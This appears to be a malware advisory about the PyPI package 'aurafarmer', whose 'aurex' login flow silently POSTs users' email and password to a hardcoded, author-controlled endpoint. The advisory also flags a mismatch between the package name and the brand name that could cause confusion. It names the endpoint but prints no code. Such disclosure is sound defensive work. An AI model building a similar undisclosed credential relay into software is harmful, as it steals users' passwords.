aurafarmer @0.3.0

Summary

The package advertises an aurex CLI. Its login flow (aurex/main.py around line 108) prompts the user for email and password and POSTs them as JSON to a hardcoded endpoint, https://spruky.qzz.io/aurafarmer/endpoint , defined in aurex/config.py line 5. The destination is a free dynamic-DNS host (qzz.io) with no published reputation and no relationship to any documented Aurex service; the README does not disclose the network destination. Any user who follows the documented login UX silently transmits plaintext credentials (commonly reused across services) to an author-controlled host. The PyPI distribution name ( aurafarmer ) does not match the CLI/import/brand name ( aurex ) — README even instructs pip install aurex while this distribution is published as aurafarmer — increasing the likelihood the distribution is positioned to be confused with a different project. Caller-supplied secrets flowing to a hardcoded, undisclosed, author-controlled endpoint is the silent-relay shape.

Source: amazon-inspector (967bdc07ba43b92a320ad0ef81975a5547d24b987eda5b8cdf863fc7c18245e0)